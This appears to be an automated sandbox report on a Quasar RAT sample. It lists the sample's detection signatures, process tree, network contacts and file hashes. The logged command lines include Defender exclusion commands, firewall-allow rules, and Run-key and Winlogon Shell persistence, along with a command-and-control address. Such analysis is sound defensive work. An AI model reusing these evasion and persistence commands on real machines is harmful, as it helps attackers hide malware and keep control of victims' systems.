Analysis Overview
SHA256
18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e
Threat Level: Known bad
The file 18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Unexpected DNS network traffic destination
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Looks up external IP address via web service
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 09:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 09:56
Reported
2023-08-01 09:59
Platform
win10v2004-20230703-en
Max time kernel
45s
Max time network
157s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ratt.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e.exe
"C:\Users\Admin\AppData\Local\Temp\18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="GBSDSUCH" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 8 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 8 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.135.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.141.123.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4728-146-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4728-147-0x00000000029B0000-0x00000000029C0000-memory.dmp
memory/4728-148-0x0000000002970000-0x00000000029A6000-memory.dmp
memory/4728-149-0x0000000005050000-0x0000000005678000-memory.dmp
memory/4728-150-0x0000000004F80000-0x0000000004FA2000-memory.dmp
memory/4728-151-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/4728-152-0x0000000005950000-0x00000000059B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gezymuba.rpu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4728-162-0x0000000005F50000-0x0000000005F6E000-memory.dmp
memory/4728-163-0x00000000029B0000-0x00000000029C0000-memory.dmp
memory/4728-166-0x0000000074D20000-0x00000000754D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
memory/4408-168-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4408-169-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/4408-170-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d6bff751a9ac261f996f2207df7f72b |
| SHA1 | ab8f55c36d55bf4aa9c26223127bd2e3809507fd |
| SHA256 | a33ca5b2ab98da552c5813fdfd859cce29d8ac4d764194dde0808b465b87477d |
| SHA512 | 0353d39deb65cc8fbe8fbf27f21c7acaa8437dbecea2bd76febb5b367347b7c1b0e0e0d8243168ab198ab41b9bcbb2bcfb405adce048a104537a57e457eb09f4 |
memory/4408-181-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/4408-183-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/5028-184-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/5028-185-0x0000000002540000-0x0000000002550000-memory.dmp
memory/5028-188-0x0000000002540000-0x0000000002550000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c905ffa927abb0f0f7c163a5a1dd1c |
| SHA1 | 873ba4329032762c194685f2c359e529654e8402 |
| SHA256 | d06c705f9092b2d4be7569178775b7ff17a58336e14b4c507c780b0bf95832ae |
| SHA512 | 88a495eb8896731764ca9e891c2f72ef855ca352c6794fcdac07f60d597789070f33fcbce3ae3b6fb4fc148346a70da735e8c569b8470804511315ec7a48acc2 |
memory/5028-197-0x0000000002540000-0x0000000002550000-memory.dmp
memory/5028-199-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4204-200-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4204-210-0x00000000027F0000-0x0000000002800000-memory.dmp
memory/4204-211-0x00000000027F0000-0x0000000002800000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0dd2e3d360f7c914630427055f7bfc7c |
| SHA1 | 0a7d697032a6f1b3af69a52cc0f28a44e2a2520a |
| SHA256 | 6d849b6600794030f9b5d87c0853cc567fd250ee74a093595831546890398f35 |
| SHA512 | a87f7ecb4428f6a6470acd4be1af092f422f75d76b5908a49831c1fc151f914550a262ede9671c3c153f458f02220c2b710b74343625abf461623f281d18bf05 |
memory/4204-214-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/1784-215-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/1784-216-0x0000000003350000-0x0000000003360000-memory.dmp
memory/1784-217-0x0000000003350000-0x0000000003360000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9cf99bfede61b98f3dddd53a91dd9dfc |
| SHA1 | 63e9e9f8891e7b200fa1dabebd7a9da8144fe54a |
| SHA256 | ba339ea50392d05a66f07d0e65d7cecc219beb0b43fca230091447ce9ae6ec97 |
| SHA512 | 246f129e524a5a7f5e2b5f74e472debdb465d7e20a0158ff3b89039e870c3c1fec29c98e1030b70ba5dedbe205599500fa311e0a495dccee7ca771614eb347ad |
memory/1784-229-0x0000000003350000-0x0000000003360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
memory/4684-233-0x0000000000400000-0x0000000000432000-memory.dmp
memory/1784-230-0x0000000074D20000-0x00000000754D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
memory/4684-237-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
memory/4684-241-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | f3e3c928063acb6abef078a4c7018bb5 |
| SHA1 | 7fe40c010d3a03bd1aa0b2ff192c07034fec496e |
| SHA256 | 571fb084ee7ad487cc9971de2a347a77e60dd3436cd233f0f18f10dc3bfed220 |
| SHA512 | 967ac65a005ba64c99658967505c36532f2ff6814cd1c9c44cf47bc8dffdffa9ac4cc2b262c992801b1596e39916bdcb43a589f82d48b370c798a326c540f112 |
memory/2084-246-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-245-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2084-247-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f41849d143ead1529ea2217b4ecc027 |
| SHA1 | 6ad6b356f9f4bff5fb822bbd076de2c4f040713f |
| SHA256 | 06bdd2b3d1f0774140866f6bf16209ab54ff2e7a6222e1267bd13bb69e8869b7 |
| SHA512 | 450a42773b7985a2584ae24278f3d21c09fec3e57b48b3e1639831eddd6a34a2dce6b4cba52323f2dab1f7fb2bfbe33e49016459cc14ba9a19488277957faedc |
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/2084-259-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-260-0x0000000006AB0000-0x0000000006AE2000-memory.dmp
memory/2084-261-0x0000000070A70000-0x0000000070ABC000-memory.dmp
memory/2084-271-0x0000000006A90000-0x0000000006AAE000-memory.dmp
memory/2084-272-0x0000000007E30000-0x00000000084AA000-memory.dmp
memory/2084-273-0x0000000007800000-0x000000000781A000-memory.dmp
memory/2084-274-0x0000000007850000-0x000000000785A000-memory.dmp
memory/2084-275-0x0000000007A80000-0x0000000007B16000-memory.dmp
memory/2084-276-0x0000000007A00000-0x0000000007A0E000-memory.dmp
memory/2084-277-0x0000000007B20000-0x0000000007B3A000-memory.dmp
memory/2084-278-0x0000000007A50000-0x0000000007A58000-memory.dmp
memory/2084-279-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2084-280-0x0000000007B90000-0x0000000007BB2000-memory.dmp
memory/2084-281-0x0000000008A60000-0x0000000009004000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 4633eb38b340638efbffd0ee1ebb7801 |
| SHA1 | 108c162e7c6b3189137bdcf4a8860ba4247d3f09 |
| SHA256 | 9446c39293b8598670e580a522f7fca4426455b2bf83ce7b1e6783e9a9a04008 |
| SHA512 | 3cd5037eb50f343b43c5fc9e6aed7186db2732ccd0d9400ff43b0cb7f7e4e435c0e82065c82d63163a35f2ebc05ffdf097d72cc536aa8da3c0df8e12b20e31d8 |
memory/2084-283-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-284-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-285-0x000000007FCC0000-0x000000007FCD0000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 669e07b57e0c14e8cfcb1e2892849d2f |
| SHA1 | 92f3b3bdbe57694546a65f842fe235c4c48c0022 |
| SHA256 | c7a20858c267b627b366865dcf696379b32ba0cb92dc8537333ba06f5b6a728d |
| SHA512 | 8ceb665214cdde2b6f1c95275d6d4251975e80faa3c50bf31298cee14b60074299cb63a5324178278cf98ca47aafa91c1bc94247b578c1f29b05256c7743f1cd |
memory/4408-288-0x00000000003E0000-0x0000000000596000-memory.dmp
memory/4408-289-0x0000000074C50000-0x0000000075400000-memory.dmp
